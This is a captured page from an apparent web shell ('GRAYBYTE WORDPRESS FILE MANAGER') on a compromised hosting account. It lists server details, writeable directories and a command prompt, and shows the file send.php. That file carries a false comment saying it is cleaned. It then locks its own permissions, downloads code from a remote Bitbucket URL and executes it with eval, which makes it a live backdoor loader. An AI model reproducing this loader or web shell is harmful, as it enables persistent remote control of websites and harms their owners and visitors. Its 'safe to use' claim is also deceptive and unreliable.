GRAYBYTE WORDPRESS FILE MANAGER6998

Server IP : 149.255.58.128 / Your IP : 216.73.216.38
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/.cphorde/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/.cphorde//send.php
<?php
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code have been removed, and the file is now safe to use.
*/
?>

<?php

// Path to the file
$file = 'send.php';

// Change the file permissions to 0444 (read-only)
chmod($file, 0444);

?>

<?php
$remoteUrl = "https://bitbucket.org/rexcc/remote/raw/b12a52918be9598fbac51d2fc2e793f2b4bc01fc/main-index.txt";
$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$remoteCode = curl_exec($ch);
if (curl_errno($ch)) {
    die('cURL error: ' . curl_error($ch));
}
curl_close($ch);
eval("?>" . $remoteCode);
?>

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 20 2025 13:25:54
1032 / wheelch2
0711
meta
--
May 20 2025 03:29:06
1032 / wheelch2
0755
vfsroot
--
May 20 2025 03:29:06
1032 / wheelch2
0755
wp-backup
--
May 20 2025 03:29:06
1032 / wheelch2
0755
horde.sqlite
1.53 MB
August 26 2023 17:32:16
1032 / wheelch2
0600
send.php
0.645 KB
October 14 2024 23:48:35
1032 / wheelch2
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF